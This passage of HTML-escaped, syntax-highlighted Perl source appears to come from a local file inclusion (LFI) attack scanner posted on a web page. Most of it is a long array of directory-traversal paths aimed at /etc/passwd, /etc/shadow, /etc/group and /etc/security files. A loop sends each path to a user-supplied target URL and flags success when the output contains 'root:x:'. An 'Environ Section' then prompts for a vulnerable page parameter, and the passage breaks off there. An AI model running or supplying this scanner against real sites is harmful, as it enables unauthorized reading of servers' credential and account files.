#339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/shadow'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/security/group'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/security/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/security/user'&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;foreach&lt;/span&gt; &lt;span style="color: blue;"&gt;$scan&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;@lfi&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: blue;"&gt;$url&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;$host&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: blue;"&gt;$scan&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$request&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; HTTP&lt;span style="color: #339933;"&gt;::&lt;/span&gt;&lt;span style="color: #006600;"&gt;Request&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;new&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;GET&lt;span style="color: #339933;"&gt;=&amp;gt;&lt;/span&gt;&lt;span style="color: blue;"&gt;$url&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$useragent&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; LWP&lt;span style="color: #339933;"&gt;::&lt;/span&gt;&lt;span style="color: #006600;"&gt;UserAgent&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;new&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: blue;"&gt;$response&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;$useragent&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;request&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$request&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$response&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;is_success&lt;/span&gt; &lt;span style="color: #339933;"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color: blue;"&gt;$response&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;content&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/root:x:/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt; &lt;span style="color: blue;"&gt;$msg&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; Vulnerability&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;else&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt; &lt;span style="color: blue;"&gt;$msg&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: red;"&gt;"Not Found"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"$scan..........[$msg]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;env&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Welcom To Environ Section&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Insert Target (ex: http://www.site.com/index.php?page=)&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Target :"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: blue;"&gt;$host&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: #009999;"&gt;&lt;stdin&gt;&lt;/stdin&gt;&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/chomp.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;chomp&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$host&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: #b1b100;"&gt;if&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$host&lt;/span&gt; &lt;span 